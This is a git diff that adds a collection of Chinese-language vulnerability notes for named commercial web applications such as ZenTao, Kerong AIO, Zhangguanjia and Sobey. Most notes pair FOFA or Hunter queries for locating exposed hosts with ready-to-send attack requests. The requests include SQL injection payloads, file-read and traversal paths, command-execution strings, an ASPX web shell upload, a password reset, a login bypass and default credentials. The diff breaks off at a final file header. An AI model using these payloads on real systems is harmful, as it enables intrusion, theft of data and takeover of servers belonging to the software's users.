+禅道21.1 module\search\ control.php 在 againstCond 的拼接过程中，每个单词被直接添加到查询条件中，没有进行任何过滤或转义处理。如果 $word 是单引号（'），它会被包含在 + 运算符和双引号内，导致生成的 SQL 查询语句不正确。likeCondition 直接将 $keywords 插入到 SQL 查询中，没有进行任何过滤或转义处理。如果 $keywords 包含特殊字符（如单引号等），会导致生成的 SQL 查询语句不正确，从而产生 SQL 注入漏洞。
+
+## fofa
+
+```javascript
+app="易软天创-禅道系统"
+```
+
+## poc
+
+```javascript
+GET /index.php?m=search&f=index&words=1&type=all&zin=1 HTTP/1.1
+Host: 192.168.88.6
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: /
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Referer: http://192.168.88.6/
+X-ZIN-Options: {"selector":["#configJS","title>","body>*"],"type":"list"}
+X-ZIN-App: search
+X-Zin-Cache-Time: 0
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Cookie: zentaosid=d5ikdmm295l1ca5ec4an8p4f7u; lang=zh-cn; vision=rnd; device=desktop; theme=default; keepLogin=on; za=admin; zp=abd630d8e942046184fb94d4e591e66cd011665a; hideMenu=false; tab=search
+Priority: u=4
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501131036576.png)
+
+python sqlmap.py -r 1.txt --level=5 --risk=3 --threads=10 --dbms=mysql
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501131037779.png)
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16976
\ No newline at end of file
diff --git a/禅道开源项目管理软件信息收集.md b/禅道开源项目管理软件信息收集.md
new file mode 100644
index 0000000..cb2042d
--- /dev/null
+++ b/禅道开源项目管理软件信息收集.md
@@ -0,0 +1,23 @@
+# 禅道开源项目管理软件信息收集
+
+# 1. 简介
+<font style="color:rgb(64, 72, 91);">禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整地覆盖了项目管理的核心流程。</font>
+
+<font style="color:rgb(64, 72, 91);">禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的 API 可以调用。</font>
+
+# <font style="color:rgb(51, 51, 51);">2. 信息收集</font>
+1. **查看禅道版本信息**
+
+`/zentao/index.php?mode=getconfig`
+
+![1677052214444-d0ebf239-9fbf-4af0-b959-450f2ddadd6b.png](./img/g9ITGzx8_7tv859W/1677052214444-d0ebf239-9fbf-4af0-b959-450f2ddadd6b-400325.png)
+
+2. **默认密码admin/123456**
+3. **绝对路径**
+
+`/zentao/sss`![1677053746338-7b9bbe00-9613-42b4-8e3a-a8fad424a87f.png](./img/g9ITGzx8_7tv859W/1677053746338-7b9bbe00-9613-42b4-8e3a-a8fad424a87f-217839.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/co25m5tpq9n2lh9u>
\ No newline at end of file
diff --git a/私有云管理平台存在登录绕过漏洞.md b/私有云管理平台存在登录绕过漏洞.md
new file mode 100644
index 0000000..f77f419
--- /dev/null
+++ b/私有云管理平台存在登录绕过漏洞.md
@@ -0,0 +1,21 @@
+# 私有云管理平台存在登录绕过漏洞
+
+私有云管理平台存在登录绕过漏洞
+
+## hunter
+
+```yaml
+web.title="私有云管理后台"
+```
+
+## poc
+
+登陆界面抓包改返回响应的数据
+
+```java
+{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
+```
+
+![image-20240821093116155](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210931202.png)
+
+![image-20240821092633292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210926351.png)
\ No newline at end of file
diff --git a/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md b/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
new file mode 100644
index 0000000..d03786a
--- /dev/null
+++ b/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 科汛新职教网校系统CheckOrder存在SQL注入漏洞
+
+科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="/KS_Inc/static/edu"
+```
+
+## poc
+```javascript
+POST /webapi/APP/CheckOrder HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: application/json, text/javascript, */*; q=0.01
+Priority: u=0
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+
+{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}
+```
+
+![image-20241227223044294](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272230369.png)
\ No newline at end of file
diff --git a/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md b/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md
new file mode 100644
index 0000000..72b4b32
--- /dev/null
+++ b/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
+
+## fofa
+```
+body="changeAccount('8000')"
+```
+## 目录遍历
+```
+http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
+```
+
+## 文件上传
+```
+POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
+Host: xxxxxx
+Connection: lose
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2
+
+demo
+```
+
+## 任意文件读取
+```
+http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
+```
diff --git a/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md b/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md
new file mode 100644
index 0000000..40ab16c
--- /dev/null
+++ b/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 科荣 AIO 管理系统 ReportServlet 存在任意文件读取漏洞
+
+# 一、漏洞简介
+科荣AIO企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在任意文件读取漏洞，攻击者可以读取敏感文件。
+
+# 二、影响版本
++ 科荣 AIO 管理系统 
+
+# 三、资产测绘
++ hunter`app.name="科荣 AIO"`
++ 特征
+
+![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/XvBttgxBfIbQVhAw/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-362329.png)
+
+# 四、漏洞复现
+```plain
+/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
+```
+
+![1703605110708-aaf15e4f-0d1d-42ac-b61e-58ee7433ad4e.png](./img/XvBttgxBfIbQVhAw/1703605110708-aaf15e4f-0d1d-42ac-b61e-58ee7433ad4e-041534.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yci7gf7f8ezqhzft>
\ No newline at end of file
diff --git a/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md b/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md
new file mode 100644
index 0000000..be6a73c
--- /dev/null
+++ b/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# 科荣 AIO 管理系统 ReportServlet 存在目录遍历漏洞
+
+# 一、漏洞简介
+科荣AIO企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统 ReportServlet 存在目录遍历漏洞。
+
+# 二、影响版本
++ 科荣 AIO 管理系统 
+
+# 三、资产测绘
++ hunter`app.name="科荣 AIO"`
++ 特征
+
+![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/d0I-odb_X4vG0cJx/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-658775.png)
+
+# 四、漏洞复现
+```plain
+/ReportServlet?operation=getFileList&path=../../../
+```
+
+![1703605287356-07bc4a86-49d8-48fd-b476-7346b62ee0de.png](./img/d0I-odb_X4vG0cJx/1703605287356-07bc4a86-49d8-48fd-b476-7346b62ee0de-355215.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sl2fy096ko7xcihw>
\ No newline at end of file
diff --git a/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md b/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md
new file mode 100644
index 0000000..182f924
--- /dev/null
+++ b/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md
@@ -0,0 +1,38 @@
+# 科荣 AIO 管理系统 UtilServlet 存在任意文件读取漏洞
+
+# 一、漏洞简介
+科荣AIO企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在任意文件读取漏洞，攻击者可以读取敏感文件。
+
+# 二、影响版本
++ 科荣 AIO 管理系统 
+
+# 三、资产测绘
++ hunter`app.name="科荣 AIO"`
++ 特征
+
+![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/KJn1NI1bH8toct3T/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-007622.png)
+
+# 四、漏洞复现
+```plain
+POST /UtilServlet HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Content-Length: 52
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Pragma: no-cache
+Upgrade-Insecure-Requests: 1
+
+operation=readErrorExcel&fileName=C:\windows/win.ini
+```
+
+![1699631836577-be6e6474-29de-4eba-aca2-4b8170c58b0a.png](./img/KJn1NI1bH8toct3T/1699631836577-be6e6474-29de-4eba-aca2-4b8170c58b0a-883570.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/udgwgxz7zdoguolr>
\ No newline at end of file
diff --git a/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md b/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md
new file mode 100644
index 0000000..0177da1
--- /dev/null
+++ b/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md
@@ -0,0 +1,30 @@
+# 科荣 AIO 管理系统 UtilServlet 存在远程命令执行漏洞
+
+# 一、漏洞简介
+科荣AIO企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统 UtilServlet 存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 科荣 AIO 管理系统 
+
+# 三、资产测绘
++ hunter`app.name="科荣 AIO"`
++ 特征
+
+![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/8C_gc1ZbNQq7MyLJ/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-959475.png)
+
+# 四、漏洞复现
+```plain
+POST /UtilServlet HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ 
+operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
+```
+
+![1706534515581-13127fb9-02eb-477c-99f7-de2a3cca7804.png](./img/8C_gc1ZbNQq7MyLJ/1706534515581-13127fb9-02eb-477c-99f7-de2a3cca7804-488011.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/maxbgi836ngdayg3>
\ No newline at end of file
diff --git a/科荣AIO管理系统endTime参数存在SQL注入漏洞.md b/科荣AIO管理系统endTime参数存在SQL注入漏洞.md
new file mode 100644
index 0000000..f6854e2
--- /dev/null
+++ b/科荣AIO管理系统endTime参数存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 科荣AIO管理系统endTime参数存在SQL注入漏洞
+
+科荣AIO endTime接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```
+body="changeAccount('8000')"
+```
+
+## poc
+
+```
+GET /moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1 HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
diff --git a/科荣AIO系统接口UtilServlet存在代码执行漏洞.md b/科荣AIO系统接口UtilServlet存在代码执行漏洞.md
new file mode 100644
index 0000000..b4f6323
--- /dev/null
+++ b/科荣AIO系统接口UtilServlet存在代码执行漏洞.md
@@ -0,0 +1,25 @@
+# 科荣AIO系统接口UtilServlet存在代码执行漏洞
+
+科荣AIO UtilServlet 存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。
+
+## fofa
+
+```javascript
+body="changeAccount('8000')"
+```
+
+## poc
+
+```javascript
+POST /UtilServlet HTTP/1.1
+Host:127.0.0.1
+User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length:322
+
+operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
+```
+
+![920396433c98be57376c249f469ae450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111012822.png)
\ No newline at end of file
diff --git a/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md b/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..d37bbd8
--- /dev/null
+++ b/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 秒优科技-供应链管理系统doAction存在SQL注入漏洞
+
+由于秒优科技-供应链管理系统 doAction 接口未对用户传入的参数进行合理的校验和过滤，导致传入的参数直接携带到数据库执行，导致SQL注入漏洞，未经身份验证的攻击者可通过此漏洞获取数据库权限，深入利用可获取服务器权限。
+
+## fofa
+```javascript
+app="秒优科技-供应链管理系统"
+```
+
+## poc
+```javascript
+POST /zh/login/doAction HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Priority: u=0
+
+{"usercode":"1'+(SELECT CHAR(83)+CHAR(87)+CHAR(119)+CHAR(105) WHERE 6635=6635 AND 2366 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2366=2366) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))))+'","password":"1","remember":false,"ip":null,"city":null,"ISERP":"ISERP"}
+```
+
+![image-20241219151645423](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191516482.png)
\ No newline at end of file
diff --git a/竞优（广州）信息技术有限公司商业租赁管理系统存在Trace信息泄露.md b/竞优（广州）信息技术有限公司商业租赁管理系统存在Trace信息泄露.md
new file mode 100644
index 0000000..d82c93b
--- /dev/null
+++ b/竞优（广州）信息技术有限公司商业租赁管理系统存在Trace信息泄露.md
@@ -0,0 +1,25 @@
+# 竞优（广州）信息技术有限公司商业租赁管理系统存在Trace信息泄露
+
+# 一、漏洞简介
+作为地产及不动产数字化行业深耕者，三十多年来始终专注于企业管理软件的技术开发和咨询服务。我们多年对地产及不动产行业的专注投入、以及深刻理解能为企业提供专业的产品、高效的实施服务、强大的技术支持和优质的售后保障。竞优（广州）信息技术有限公司商业租赁管理系统存在Trace信息泄露
+
+# 二、影响版本
++ 商业租赁管理系统
+
+# 三、资产测绘
++ fofa：`web.body="商业租赁管理系统"`
++ 特征
+
+![1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365.png](./img/aqlzwYG_j1SYsfpl/1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365-447474.png)
+
+# 四、漏洞复现
+```java
+/RMS/Trace.axd
+```
+
+![1734059130097-8678b441-56e8-4fde-86b4-c14ec8c293ea.png](./img/aqlzwYG_j1SYsfpl/1734059130097-8678b441-56e8-4fde-86b4-c14ec8c293ea-490959.png)
+
+
+
+> 更新: 2024-12-20 14:53:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kf3819ge5d4qk9wk>
\ No newline at end of file
diff --git a/竞优（广州）信息技术有限公司商业租赁管理系统存在account信息泄露.md b/竞优（广州）信息技术有限公司商业租赁管理系统存在account信息泄露.md
new file mode 100644
index 0000000..72dd4d7
--- /dev/null
+++ b/竞优（广州）信息技术有限公司商业租赁管理系统存在account信息泄露.md
@@ -0,0 +1,36 @@
+# 竞优（广州）信息技术有限公司商业租赁管理系统存在account信息泄露
+
+# 一、漏洞简介
+作为地产及不动产数字化行业深耕者，三十多年来始终专注于企业管理软件的技术开发和咨询服务。我们多年对地产及不动产行业的专注投入、以及深刻理解能为企业提供专业的产品、高效的实施服务、强大的技术支持和优质的售后保障。竞优（广州）信息技术有限公司商业租赁管理系统存在account信息泄露。
+
+# 二、影响版本
++ 商业租赁管理系统
+
+# 三、资产测绘
++ fofa：`web.body="商业租赁管理系统"`
++ 特征
+
+![1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365.png](./img/g3wDnKSTiXIbeg2X/1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365-805138.png)
+
+# 四、漏洞复现
+```java
+POST /rental/contract/api/account.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetAccountInfo"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetAccountInfo xmlns="http://tempuri.org/" />
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1734107735397-9fddf4a4-d582-4080-852b-0c22e3914398.png](./img/g3wDnKSTiXIbeg2X/1734107735397-9fddf4a4-d582-4080-852b-0c22e3914398-503109.png)
+
+
+
+> 更新: 2024-12-20 14:53:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uzg50h4mdksdemst>
\ No newline at end of file
diff --git a/章管家Druid未授权访问漏洞.md b/章管家Druid未授权访问漏洞.md
new file mode 100644
index 0000000..19b61f8
--- /dev/null
+++ b/章管家Druid未授权访问漏洞.md
@@ -0,0 +1,25 @@
+# 章管家 Druid未授权访问漏洞
+
+# 一、漏洞简介
+章管家是国内专业智能印章管理平台，专注为传统印章管理提供整套解决方案。章管家 Druid存在未授权，导致信息泄露漏洞。
+
+# 二、影响版本
++ 章管家
+
+# 三、资产测绘
++ fofa`app="章管家-印章智慧管理平台"`
++ 特征
+
+![1710317023603-d16c8499-7bb7-43f9-a4d0-34ea66bea032.png](./img/yyr6IA3aoCGUX0A7/1710317023603-d16c8499-7bb7-43f9-a4d0-34ea66bea032-658621.png)
+
+# 四、漏洞复现
+```java
+/druid/index.html
+```
+
+![1710317051910-3d9b5692-56dd-4a1b-92e3-ebd6e617d9d9.png](./img/yyr6IA3aoCGUX0A7/1710317051910-3d9b5692-56dd-4a1b-92e3-ebd6e617d9d9-120289.png)
+
+
+
+> 更新: 2024-03-13 23:54:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tcw5gi81h5fg6ccr>
\ No newline at end of file
diff --git a/章管家list.htm存在SQL注入漏洞.md b/章管家list.htm存在SQL注入漏洞.md
new file mode 100644
index 0000000..496d49e
--- /dev/null
+++ b/章管家list.htm存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 章管家list.htm存在SQL注入漏洞
+
+章管家 department/list.htm 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="章管家登录-公章在外防私盖"
+```
+
+## poc
+
+```javascript
+POST /app/department/list.htm HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+token=dingtalk_token&person_id=1&unit_id=1&id=' or SL EEP(6) or '
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132236104.png)
\ No newline at end of file
diff --git a/章管家updatePwd.htm存在任意账号密码重置漏洞.md b/章管家updatePwd.htm存在任意账号密码重置漏洞.md
new file mode 100644
index 0000000..ea266c4
--- /dev/null
+++ b/章管家updatePwd.htm存在任意账号密码重置漏洞.md
@@ -0,0 +1,23 @@
+# 章管家updatePwd.htm存在任意账号密码重置漏洞
+
+章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。
+
+```yaml
+app="章管家-印章智慧管理平台"
+```
+
+## poc
+
+```java
+POST /app/updatePwd.htm HTTP/1.1
+Host:
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Connection: close
+Content-Length: 87
+Content-Type: application/x-www-form-urlencoded
+
+mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token
+```
+
diff --git a/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md b/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md
new file mode 100644
index 0000000..f8ee267
--- /dev/null
+++ b/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞
+
+管家婆订货易在线商城是一个专为传统企业打造的B2B订货平台，帮助传统企业构建专属的订货平台，集合了PC商城、微信商城、小程序商城、APP商城以及H5触屏版商城，形成五网合一的全方位覆盖。` /api/Upload/UploadImgNoCheck `接口处存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+title="订货易" || title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"
+```
+
+## poc
+
+```javascript
+POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
+
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="Filedata";filename="rce.aspx"
+Content-Type: image/jpeg
+
+GIF89a
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryj7OlOPiiukkdktZR--
+```
+
+![image-20241128095645719](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280956783.png)
\ No newline at end of file
diff --git a/索贝融媒体search存在SQL注入漏洞.md b/索贝融媒体search存在SQL注入漏洞.md
new file mode 100644
index 0000000..8141410
--- /dev/null
+++ b/索贝融媒体search存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 索贝融媒体search存在SQL注入漏洞
+
+索贝融媒体产品是成都索贝数码科技股份有限公司（简称索贝）为各级电视台和媒体机构打造的一套集互联网和电视融合生产的解决方案。索贝融媒体 Sc-TaskMonitoring/rest/task/search 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+icon_hash="689611853"
+```
+
+## poc
+
+```javascript
+POST /Sc-TaskMonitoring/rest/task/search HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/json
+Cookie: token=5ab95532238da1b7d9eb20de7ecef90e; siteCode=S1
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+
+{"page":1,"search":{"assignedCodes":""},"size":10,"date":{},"sort":{"field":"1 AND EXTRACTVALUE(8342,CONCAT(0x7e,0x7171787171,(SELECT (ELT(8342=8342,1))),0x716b706b71,0x7e))","desc":true}}
+```
+
+![image-20241122150816351](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221508580.png)
\ No newline at end of file
diff --git a/索贝融媒体存在硬编码漏洞.md b/索贝融媒体存在硬编码漏洞.md
new file mode 100644
index 0000000..e893e2e
--- /dev/null
+++ b/索贝融媒体存在硬编码漏洞.md
@@ -0,0 +1,18 @@
+# 索贝融媒体存在硬编码漏洞
+
+索贝融媒体存在硬编码漏洞，导致默认密码泄露造成的后台管理系统的非法利用。
+
+## fofa
+
+```javascript
+body="/Sc-TaskMonitoring/" || header="Sobey"
+```
+
+## poc
+
+```javascript
+sobey/sobey
+sobey/Sobeyhive-2016
+```
+
+![image-20241106230744176](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062307238.png)
\ No newline at end of file
diff --git a/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md b/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md
new file mode 100644
index 0000000..566e7a3
--- /dev/null
